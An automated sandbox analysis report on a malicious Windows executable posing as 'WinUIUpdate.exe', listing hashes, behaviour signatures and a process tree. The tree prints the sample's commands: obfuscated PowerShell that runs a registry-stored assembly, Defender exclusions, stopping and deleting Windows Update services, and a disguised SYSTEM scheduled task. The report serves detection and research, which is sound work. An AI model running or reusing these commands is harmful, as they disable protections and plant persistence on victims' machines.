Analysis
-
max time kernel
150s -
max time network
54s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
-
submitted
20-03-2023 09:30
General
-
Target
WinUIUpdate.exe
-
Size
3.7MB
-
MD5
b0a84e4330a9c00c57d3a3e7885f7946
-
SHA1
bfe5f9b94081c25827e2bc90bb39a8c701033519
-
SHA256
6320b40b4809bd711e6a50eebacce6ac51d3cbb92f84d467116f79489c668a04
-
SHA512
a2214e9f6ca3b9a1aa35e2dbe8d7439ee6958e20a2bdd520a9b29693b5d0eb930bd7d26b818aad5e032ca455eb879543598dcb72e06f69775b9877ac28e77a8f
-
SSDEEP
98304:xGUMWoCIILMDNCl6b54+TUyscvBDw4pn:AGosIslo46UF8
Score
10/10
Malware Config
Signatures
-
Modifies security service 2 TTPs 2 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 6 IoCs
-
Drops file in Drivers directory 1 IoCs
-
Stops running service(s) 3 TTPs
-
Drops file in System32 directory 4 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Drops file in Program Files directory 1 IoCs
-
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 10 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation2⤵
-
C:\Windows\system32\sppsvc.exeC:\Windows\system32\sppsvc.exe2⤵
-
C:\Windows\system32\taskhost.exe"taskhost.exe"2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork2⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs2⤵
-
C:\Windows\system32\taskeng.exetaskeng.exe {07E8A0DB-C9A6-4F32-9E9C-A97A4870564B} S-1-5-18:NT AUTHORITY\System:Service:3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+'F'+''+[Char](84)+''+'W'+''+'A'+''+[Char](82)+'E').GetValue(''+'d'+''+[Char](105)+''+[Char](97)+'le'+[Char](114)+'st'+[Char](97)+''+[Char](103)+'e'+'r'+'')).EntryPoint.Invoke($Null,$Null)4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+'T'+'W'+''+'A'+''+[Char](82)+''+'E'+'').GetValue('d'+[Char](105)+''+[Char](97)+'l'+'e'+'rs'+[Char](116)+''+'a'+''+[Char](103)+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted2⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch2⤵
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{25bac9f5-3b25-47e3-b7f1-9a60afbf05f9}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe1⤵
-
\\?\C:\Windows\system32\wbem\WMIADAP.EXEwmiadap.exe /F /T /R1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\WinUIUpdate.exe"C:\Users\Admin\AppData\Local\Temp\WinUIUpdate.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#srdzkpcvs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineUA' /tr '''C:\Program Files\Google\Chrome\chromeupdater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\chromeupdater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineUA' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineUA" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\chromeupdater.exe' }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineUA /tr "'C:\Program Files\Google\Chrome\chromeupdater.exe'"3⤵
- Creates scheduled task(s)
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-12154296931903486855-2123541791-18345936142027518471694852113-14938323231640187391"1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD51dcf42a7b9a0e3702709398ce2eafbcb
SHA16b3e9982c598e289502a0e08a76e7a2f348d445e
SHA256595aa81244a551c55b4492cef43f027bd2915069376158ad3fc80928424d8bd0
SHA5125743d3b084af84bc27e6017dcc1500ce5f1482d976cee6a2aff18d87d889e9da298773f9811c11b1ae5fe4a937d28fb3118be211d89c02e3eb05176002e41500
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5VB74GZ0H1O7UNJ9URXZ.tempFilesize
7KB
MD51dcf42a7b9a0e3702709398ce2eafbcb
SHA16b3e9982c598e289502a0e08a76e7a2f348d445e
SHA256595aa81244a551c55b4492cef43f027bd2915069376158ad3fc80928424d8bd0
SHA5125743d3b084af84bc27e6017dcc1500ce5f1482d976cee6a2aff18d87d889e9da298773f9811c11b1ae5fe4a937d28fb3118be211d89c02e3eb05176002e41500
-
memory/280-230-0x00000000007E0000-0x0000000000807000-memory.dmpFilesize
156KB
-
memory/280-233-0x0000000037C00000-0x0000000037C10000-memory.dmpFilesize
64KB
-
memory/284-78-0x0000000140000000-0x0000000140029000-memory.dmpFilesize
164KB
-
memory/420-99-0x00000000008D0000-0x00000000008F7000-memory.dmpFilesize
156KB
-
memory/420-104-0x0000000037C00000-0x0000000037C10000-memory.dmpFilesize
64KB
-
memory/420-95-0x00000000008A0000-0x00000000008C1000-memory.dmpFilesize
132KB
-
memory/420-258-0x00000000008D0000-0x00000000008F7000-memory.dmpFilesize
156KB
-
memory/420-100-0x000007FEBEBE0000-0x000007FEBEBF0000-memory.dmpFilesize
64KB
-
memory/420-94-0x00000000008A0000-0x00000000008C1000-memory.dmpFilesize
132KB
-
memory/464-259-0x00000000001A0000-0x00000000001C7000-memory.dmpFilesize
156KB
-
memory/464-106-0x000007FEBEBE0000-0x000007FEBEBF0000-memory.dmpFilesize
64KB
-
memory/464-109-0x0000000037C00000-0x0000000037C10000-memory.dmpFilesize
64KB
-
memory/464-105-0x00000000001A0000-0x00000000001C7000-memory.dmpFilesize
156KB
-
memory/480-112-0x000007FEBEBE0000-0x000007FEBEBF0000-memory.dmpFilesize
64KB
-
memory/480-110-0x0000000000150000-0x0000000000177000-memory.dmpFilesize
156KB
-
memory/480-262-0x0000000000150000-0x0000000000177000-memory.dmpFilesize
156KB
-
memory/480-115-0x0000000037C00000-0x0000000037C10000-memory.dmpFilesize
64KB
-
memory/480-116-0x0000000000150000-0x0000000000177000-memory.dmpFilesize
156KB
-
memory/488-123-0x0000000037C00000-0x0000000037C10000-memory.dmpFilesize
64KB
-
memory/488-120-0x0000000000460000-0x0000000000487000-memory.dmpFilesize
156KB
-
memory/488-122-0x000007FEBEBE0000-0x000007FEBEBF0000-memory.dmpFilesize
64KB
-
memory/488-140-0x0000000000460000-0x0000000000487000-memory.dmpFilesize
156KB
-
memory/600-129-0x0000000037C00000-0x0000000037C10000-memory.dmpFilesize
64KB
-
memory/600-144-0x0000000000530000-0x0000000000557000-memory.dmpFilesize
156KB
-
memory/600-127-0x000007FEBEBE0000-0x000007FEBEBF0000-memory.dmpFilesize
64KB
-
memory/600-124-0x0000000000530000-0x0000000000557000-memory.dmpFilesize
156KB
-
memory/616-238-0x0000000001C20000-0x0000000001C47000-memory.dmpFilesize
156KB
-
memory/616-239-0x0000000037C00000-0x0000000037C10000-memory.dmpFilesize
64KB
-
memory/676-133-0x000007FEBEBE0000-0x000007FEBEBF0000-memory.dmpFilesize
64KB
-
memory/676-149-0x0000000000510000-0x0000000000537000-memory.dmpFilesize
156KB
-
memory/676-135-0x0000000037C00000-0x0000000037C10000-memory.dmpFilesize
64KB
-
memory/676-130-0x0000000000510000-0x0000000000537000-memory.dmpFilesize
156KB
-
memory/684-73-0x00000000025D0000-0x0000000002650000-memory.dmpFilesize
512KB
-
memory/684-74-0x00000000025DB000-0x0000000002612000-memory.dmpFilesize
220KB
-
memory/684-71-0x00000000025D0000-0x0000000002650000-memory.dmpFilesize
512KB
-
memory/684-69-0x000000001B100000-0x000000001B3E2000-memory.dmpFilesize
2.9MB
-
memory/684-70-0x0000000001F80000-0x0000000001F88000-memory.dmpFilesize
32KB
-
memory/684-72-0x00000000025D0000-0x0000000002650000-memory.dmpFilesize
512KB
-
memory/752-139-0x000007FEBEBE0000-0x000007FEBEBF0000-memory.dmpFilesize
64KB
-
memory/752-152-0x00000000008B0000-0x00000000008D7000-memory.dmpFilesize
156KB
-
memory/752-136-0x00000000008B0000-0x00000000008D7000-memory.dmpFilesize
156KB
-
memory/752-142-0x0000000037C00000-0x0000000037C10000-memory.dmpFilesize
64KB
-
memory/808-222-0x00000000008A0000-0x00000000008C7000-memory.dmpFilesize
156KB
-
memory/808-151-0x0000000037C00000-0x0000000037C10000-memory.dmpFilesize
64KB
-
memory/808-148-0x000007FEBEBE0000-0x000007FEBEBF0000-memory.dmpFilesize
64KB
-
memory/808-143-0x00000000008A0000-0x00000000008C7000-memory.dmpFilesize
156KB
-
memory/840-61-0x00000000026A4000-0x00000000026A7000-memory.dmpFilesize
12KB
-
memory/840-60-0x0000000001E10000-0x0000000001E18000-memory.dmpFilesize
32KB
-
memory/840-62-0x00000000026AB000-0x00000000026E2000-memory.dmpFilesize
220KB
-
memory/840-59-0x000000001B140000-0x000000001B422000-memory.dmpFilesize
2.9MB
-
memory/848-264-0x0000000000390000-0x00000000003B7000-memory.dmpFilesize
156KB
-
memory/848-150-0x0000000000390000-0x00000000003B7000-memory.dmpFilesize
156KB
-
memory/848-224-0x0000000037C00000-0x0000000037C10000-memory.dmpFilesize
64KB
-
memory/848-156-0x0000000000390000-0x00000000003B7000-memory.dmpFilesize
156KB
-
memory/960-265-0x0000000000940000-0x0000000000967000-memory.dmpFilesize
156KB
-
memory/960-228-0x0000000037C00000-0x0000000037C10000-memory.dmpFilesize
64KB
-
memory/960-160-0x0000000000940000-0x0000000000967000-memory.dmpFilesize
156KB
-
memory/980-257-0x0000000000F40000-0x0000000000F80000-memory.dmpFilesize
256KB
-
memory/980-260-0x0000000000F40000-0x0000000000F80000-memory.dmpFilesize
256KB
-
memory/980-267-0x0000000000F40000-0x0000000000F80000-memory.dmpFilesize
256KB
-
memory/1060-241-0x0000000037C00000-0x0000000037C10000-memory.dmpFilesize
64KB
-
memory/1060-240-0x00000000008F0000-0x0000000000917000-memory.dmpFilesize
156KB
-
memory/1068-250-0x00000000007E0000-0x0000000000807000-memory.dmpFilesize
156KB
-
memory/1108-255-0x0000000037C00000-0x0000000037C10000-memory.dmpFilesize
64KB
-
memory/1108-254-0x0000000000750000-0x0000000000777000-memory.dmpFilesize
156KB
-
memory/1128-242-0x0000000001D60000-0x0000000001D87000-memory.dmpFilesize
156KB
-
memory/1128-243-0x0000000037C00000-0x0000000037C10000-memory.dmpFilesize
64KB
-
memory/1180-245-0x0000000037C00000-0x0000000037C10000-memory.dmpFilesize
64KB
-
memory/1180-244-0x0000000001C70000-0x0000000001C97000-memory.dmpFilesize
156KB
-
memory/1212-247-0x0000000037C00000-0x0000000037C10000-memory.dmpFilesize
64KB
-
memory/1212-246-0x00000000021E0000-0x0000000002207000-memory.dmpFilesize
156KB
-
memory/1360-249-0x0000000037C00000-0x0000000037C10000-memory.dmpFilesize
64KB
-
memory/1360-248-0x0000000000430000-0x0000000000457000-memory.dmpFilesize
156KB
-
memory/1528-256-0x00000000001B0000-0x00000000001D7000-memory.dmpFilesize
156KB
-
memory/1556-54-0x000000013F890000-0x000000013FC51000-memory.dmpFilesize
3.8MB
-
memory/1556-77-0x000000013F890000-0x000000013FC51000-memory.dmpFilesize
3.8MB
-
memory/1600-90-0x0000000077AA0000-0x0000000077BBF000-memory.dmpFilesize
1.1MB
-
memory/1600-91-0x0000000140000000-0x0000000140029000-memory.dmpFilesize
164KB
-
memory/1600-86-0x0000000140000000-0x0000000140029000-memory.dmpFilesize
164KB
-
memory/1600-253-0x0000000000DA0000-0x0000000000DC7000-memory.dmpFilesize
156KB
-
memory/1600-88-0x0000000140000000-0x0000000140029000-memory.dmpFilesize
164KB
-
memory/1600-89-0x0000000077BC0000-0x0000000077D69000-memory.dmpFilesize
1.7MB
-
memory/1960-85-0x0000000077AA0000-0x0000000077BBF000-memory.dmpFilesize
1.1MB
-
memory/1960-84-0x0000000077BC0000-0x0000000077D69000-memory.dmpFilesize
1.7MB
-
memory/1960-83-0x0000000000FB0000-0x0000000000FD6000-memory.dmpFilesize
152KB
-
memory/1960-82-0x00000000009A0000-0x0000000000A20000-memory.dmpFilesize
512KB
-
memory/1960-81-0x00000000009A0000-0x0000000000A20000-memory.dmpFilesize
512KB
-
memory/1960-80-0x00000000009A0000-0x0000000000A20000-memory.dmpFilesize
512KB
-
memory/1960-79-0x0000000000970000-0x0000000000978000-memory.dmpFilesize
32KB
-
memory/2012-251-0x0000000000480000-0x00000000004A7000-memory.dmpFilesize
156KB
-
memory/2012-252-0x0000000037C00000-0x0000000037C10000-memory.dmpFilesize
64KB